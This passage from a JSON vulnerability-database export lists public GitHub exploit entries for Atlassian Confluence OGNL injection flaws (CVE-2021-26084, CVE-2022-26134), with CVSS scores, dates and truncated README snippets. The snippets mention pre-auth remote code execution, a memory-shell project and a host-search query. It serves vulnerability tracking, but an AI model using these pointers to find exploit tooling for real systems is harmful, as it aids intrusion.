"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2023-09-11T11:40:35", "id": "5CB77852-699B-52CD-AF0E-AFD2DE82A2B2", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T22:03:40", "description": "# CVE-2021-26084\nCVE-2021-26084\uff0cAtlassian Confluence OGNL\u6ce8\u5165\u6f0f\u6d1e\n\nA...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-10-26T06:01:38", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Server", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-26084"], "modified": "2022-09-03T22:05:44", "id": "3E0FF5E7-F93E-588A-B40A-B3381FB12F73", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:12:34", "description": "Confluence Pre-Auth Remote Code Execution via OGNL Injection (CV...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-07-30T20:56:13", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-08-03T21:18:52", "id": "CFDC15EB-BE4F-5C86-B8B0-C542A791F67D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T16:05:34", "description": "\n\n\n##...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-05T04:30:42", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-11-19T18:59:49", "id": "94DD467E-7BFF-5F8A-810C-3B1BDD195F6A", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:22:39", "description": "# CVE-2022-26134_check\n\nThe script is used to check remotely if ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-01-15T20:11:27", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-19T23:43:17", "id": "B6182C52-78F5-58BC-8D3F-EF87D0239F0E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:34:28", "description": "### CVE-2022-26134 - OGNL injection vulnerability.\n\nIn affected ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-21T11:49:48", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-03-30T14:37:47", "id": "1F9C946C-1533-5835-B5E8-641EF4FFC145", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:27:26", "description": "# CVE-2022-26134\r\n\u8fdc\u7a0b\u653b\u51fb\u8005\u5728\u672a\u7ecf\u8eab\u4efd\u9a8c\u8bc1\u7684\u60c5\u51b5\u4e0b\uff0c\u53ef\u6784\u9020OGNL\u8868\u8fbe\u5f0f\u8fdb\u884c\u6ce8\u5165\uff0c\u5b9e\u73b0\u5728Confluence ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-23T14:38:11", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-10-29T13:45:18", "id": "F0CF90CD-DC6E-5F0F-AD61-5E1694700F32", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:39:41", "description": "# CVE-2022-26134\r\nCVE-2022-26134 - Confluence Pre-Auth RCE | OGN...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T19:24:30", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-09-28T11:39:23", "id": "28E888C4-78E3-5F8D-B316-AB42FED892F9", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:35:03", "description": "<h1 align=\"center\">\u300c\ud83d\udca5\u300dCVE-2022-26134</h1>\n\n<p align=\"center\"><im...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-19T13:50:22", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-12T15:25:12", "id": "5255E938-0B92-5E2C-B1A4-21B2445C29AF", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:40:26", "description": "# Through the Wire\n\nThrough the Wire is a proof of concept explo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-03T13:59:19", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-12-03T08:37:47", "id": "3CD4239D-A6D3-5B3A-A18E-D5B99C51B5E5", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:59", "description": "# CVE-202...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T18:23:20", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-10-16T00:04:47", "id": "09477170-A03D-5C2D-AC41-0D0A8F51EDB3", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:59", "description": "# Confluence-CVE-2022-26134\n...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-05T13:51:39", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-06T01:29:57", "id": "AB8EAC0D-269A-5799-885F-B0EA2A33792C", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:46", "description": "# CVE-2022-26134 POC\n\n## Description\n```\nIn affected versions of...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T10:36:11", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-07-14T21:00:43", "id": "54DD3775-9F3C-54DF-93EF-372304E8EE4B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:36:53", "description": "# exploit_CVE-2022-26134\nCVE-2022-26134, an OGNL injection vulne...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-10T08:57:30", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-10T09:07:45", "id": "02241D2D-F86F-5FE5-95FD-6978A07FE7FA", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:36:10", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T23:01:39", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-11-13T09:08:06", "id": "FD4859A0-D69F-503C-BFDB-0C9025BDC68F", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-08-17T23:16:27", "description": "<!DOCTYPE html>\n<html dir=\"rtl\" lang=\"fa-IR\">\n\n<head>\n\t<meta cha...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-07-14T01:28:16", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-07-14T10:35:04", "id": "46787A11-B7F1-54E3-A965-2AEFCD29DB29", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-01-11T15:36:59", "description": "# [-] CVE-2022-26134 - Confluence Pre-Auth Remote Code Execution...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-13T01:25:39", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-01-11T14:56:46", "id": "464D6B41-AE5F-5E93-BD26-6E6C8E9F80BC", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T17:18:15", "description": "# CVE-2022-26134_Behinder_MemShell\n\n\u539f\u9879\u76ee\u5730\u5740:...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2023-02-04T06:51:47", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2023-06-10T18:01:35", "id": "594C33E1-9EBF-5B3B-BA76-031ACB500518", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-06-14T19:58:33", "description": "# Atlassian Confluence \u8fdc\u7a0b\u4ee3\u7801\u6267\u884c\u6f0f(CVE-2022-26134)\nFoFa\uff1atitle=\"Con...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-08T07:54:56", "type": "githubexploit", "title": "Exploit for Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2022-26134"], "modified": "2022-06-09T08:02:12", "id": "2A83DE3B-242D-51BE-84C8-5EB39AE1800E", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2023-12-03T20:37:44", "description": "# Exploit for CVE-2022-26134: Confluence Pre-Auth Remote Code Ex...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2022-06-07T11:17:25", "type": "githubexploit", "title": "Exploit for Expression Language Injection in Atlassian Confluence Data Center", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": 